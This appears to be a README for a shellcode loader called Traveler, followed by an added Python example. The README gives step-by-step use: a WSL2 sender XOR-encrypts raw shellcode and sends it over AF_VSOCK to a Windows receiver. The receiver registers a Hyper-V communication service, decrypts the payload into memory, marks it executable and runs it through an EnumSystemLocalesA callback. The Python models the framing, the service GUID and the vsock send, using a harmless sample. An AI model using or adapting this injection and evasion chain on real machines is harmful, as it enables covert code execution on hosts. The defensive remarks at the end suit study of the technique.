Phase 1: Prepare the payload
- On the Linux/WSL2 machine, generate shellcode in raw PIC format.
- Choose a lab-safe behavior (for example, showing a window or performing a benign action).
- Export the buffer to a file named `payload.bin`.
- Place `payload.bin` in the same directory as `Leymano`.
Phase 2: Start the receiver on Windows
On the Windows host, with administrator rights:
```powershell
cd C:\path\to\Traveler\receiver
.\Anchor.exe
```
Anchor will:
- Discover the active WSL instance and its GUID.
- Register the communication service under `GuestCommunicationServices`.
- Open the AF_HYPERV listener on the configured port (5005 by default).
- Wait for an incoming connection from the guest.
Expected output includes messages similar to:
```
[*] WSL2 Stream Loader
[+] LISTENER ACTIVE. Waiting for injection...
```
Phase 3: Run the sender on Linux / WSL2
On the Linux/WSL2 VM:
```bash
cd sender
./Leymano
```
Leymano will:
- Load `payload.bin` into memory.
- Generate a session key and XOR-encrypt the payload.
- Establish an AF_VSOCK socket towards `CID 2` (the host) on the configured port.
- Send key, size, and encrypted stream to Anchor.
Phase 4: Injection and execution
On Windows, Anchor:
- Receives the session key and payload size.
- Allocates an RW region and reads the encrypted stream into it.
- Applies XOR in place to recover the clear-text shellcode.
- Switches the region to RX.
- Calls `EnumSystemLocalesA`, passing the shellcode pointer as the callback, which triggers execution.
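The exchange described in Phases 2 to 4, modelled end to end so it can be run without a WSL2 VM. This is an added example, not code from the Traveler project: the README does not document the exact wire layout Leymano and Anchor use, so the frame below (a 16-byte session key, a 4-byte little-endian length, then the XOR stream) is an assumption, as are the function names. The `vsock_service_guid` helper computes the service ID Hyper-V expects under `GuestCommunicationServices` for a given vsock port (port in the first 32 bits of the fixed vsock template GUID); `send_to_host` shows the guest-side AF_VSOCK connection to CID 2 and is not exercised offline.

```python
"""Added example: the key/size/ciphertext framing between a vsock sender and an
AF_HYPERV receiver, plus the receiver-side sanity checks a loader should do
before touching the length field. Wire layout is an assumption."""
import os
import socket
import struct

KEY_LEN = 16          # assumed session key length
VMADDR_CID_HOST = 2   # well-known CID of the host on AF_VSOCK
DEFAULT_PORT = 5005   # Anchor's default port per the README

# Hyper-V maps a vsock port to a GuestCommunicationServices service ID by
# placing the port in the first 32 bits of this template GUID.
VSOCK_TEMPLATE_SUFFIX = "facb-11e6-bd58-64006a7986d3"


def vsock_service_guid(port: int) -> str:
    """Service GUID the host must register under HKLM\\SOFTWARE\\Microsoft\\
    Windows NT\\CurrentVersion\\Virtualization\\GuestCommunicationServices."""
    if not 0 <= port <= 0xFFFFFFFF:
        raise ValueError("port out of range")
    return f"{port:08x}-{VSOCK_TEMPLATE_SUFFIX}"


def xor_stream(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; the same call encrypts and decrypts."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def build_frame(shellcode: bytes, key: bytes = b"") -> bytes:
    """Sender side (Leymano's role): key, ciphertext length, ciphertext."""
    key = key or os.urandom(KEY_LEN)
    if len(key) != KEY_LEN:
        raise ValueError(f"key must be {KEY_LEN} bytes")
    if not shellcode:
        raise ValueError("refusing to frame an empty payload")
    enc = xor_stream(shellcode, key)
    return key + struct.pack("<I", len(enc)) + enc


def parse_frame(frame: bytes) -> bytes:
    """Receiver side (Anchor's role): validate the header, then recover the
    clear-text shellcode. Truncated or oversized frames are rejected rather
    than read past the buffer."""
    header_len = KEY_LEN + 4
    if len(frame) < header_len:
        raise ValueError("frame shorter than header")
    key = frame[:KEY_LEN]
    (size,) = struct.unpack("<I", frame[KEY_LEN:header_len])
    enc = frame[header_len:header_len + size]
    if len(enc) != size or len(frame) != header_len + size:
        raise ValueError("length field does not match frame size")
    return xor_stream(enc, key)


def send_to_host(frame: bytes, port: int = DEFAULT_PORT) -> None:
    """Deliver the frame from inside WSL2 to the host listener over AF_VSOCK.
    Requires a Linux guest with the vsock transport; not run by the demo."""
    with socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) as s:
        s.connect((VMADDR_CID_HOST, port))
        s.sendall(frame)


# Constructed stand-in for payload.bin: eight x64 'ret' bytes, never executed here.
SAMPLE_SHELLCODE = b"\xc3" * 8


def demo() -> bytes:
    """Round-trip the sample through the sender and receiver paths."""
    return parse_frame(build_frame(SAMPLE_SHELLCODE))


if __name__ == "__main__":
    print("service GUID for port", DEFAULT_PORT, "=", vsock_service_guid(DEFAULT_PORT))
    print("recovered:", demo().hex())
```

Two points worth keeping in mind when adapting this. The key travels in the clear on the same socket as the ciphertext, so the XOR only hides the raw shellcode bytes from naive scanning of the stream; anyone who can read the vsock channel can decode it. And the length check in `parse_frame` is the receiver-side guard that matters most: a loader that trusts the size field and reads into its RW region based on it is a memory-corruption bug on the host, not a lab convenience.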